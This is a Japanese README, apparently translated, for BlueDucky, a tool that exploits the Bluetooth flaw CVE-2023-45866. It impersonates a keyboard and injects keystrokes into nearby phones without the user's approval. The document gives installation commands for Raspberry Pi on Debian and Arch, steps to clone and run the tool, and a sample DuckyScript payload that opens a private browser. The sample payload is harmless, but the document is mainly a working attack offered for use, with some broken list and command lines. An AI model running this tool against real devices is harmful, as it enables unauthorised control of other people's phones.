
BlueDuckyは、Bluetoothの脆弱性(特にCVE-2023-45866)を悪用し、攻撃者がターゲットデバイスにキーストロークを注入できるようにします。攻撃者のデバイスはBluetoothキーボードになりすまし、ユーザーの承認なしに暗号化された接続を確立します。BlueDuckyツールはこのプロセスを自動化します。
HackNexusの皆さんに感謝します。VCに参加してください! https://discord.gg/HackNexus
メモ: テスト用にRaspberry Pi以外のラップトップや他のデバイスでこれを実行することはできません。そのため、発生した問題は各自で解決してください。アダプターを購入する余裕がありません。
🚨 CVE-2023-45866 - BlueDuckyの実装 (DuckyScriptを使用)
🔓 認証されていないピアリングによるコード実行 (HIDキーボードを使用)
これはmarcnewlinによって発見されたCVEの実装です
BlueDuckyはBluetoothデバイスの脆弱性を悪用するための強力なツールです。このスクリプトを実行することで、次のことができます:
私はこれをRaspberry Pi 4のデフォルトのBluetoothモジュールで正常に実行しました。さまざまな電話機に対して動作しますが、ニュージーランドのブランドVodafoneは例外として興味深いです。
# update apt
sudo apt-get update
sudo apt-get -y upgrade
# install dependencies from apt
sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev \
git gcc python3-pip python3-setuptools \
python3-pydbus
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
# update pacman & packages
sudo pacman -Syyu
# install dependencies
# since arch doesn't separate lib packages: libbluetooth-dev included in bluez package
sudo pacman -S bluez-tools bluez-utils bluez-deprecated-tools \
python-setuptools python-pydbus python-dbus
git gcc python-pip \
# install pybluez from source
git clone https://github.com/pybluez/pybluez.git
cd pybluez
sudo python3 setup.py install
# build bdaddr from the bluez source
cd ~/
git clone --depth=1 https://github.com/bluez/bluez.git
gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
sudo cp bdaddr /usr/local/bin/
git clone https://github.com/pentestfunctions/BlueDucky.git
cd BlueDucky
sudo hciconfig hci0 up
python3 BlueDucky.py
または、
pip3 install -r requirements.txt
🚧 作業中:
REM ペイロードのタイトル
STRING ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-=+\|[{]};:'",<.>/?
GUI D
REM プライベートブラウザを開いてhackertyper.netにアクセス
DELAY 200
ESCAPE
GUI d
ALT ESCAPE
GUI b
DELAY 700
REM PRIVATE_BROWSERはCTRL + SHIFT + Nと同じ
PRIVATE_BROWSER
DELAY 700
CTRL l
DELAY 300
STRING hackertyper.net
DELAY 300
ENTER
DELAY 300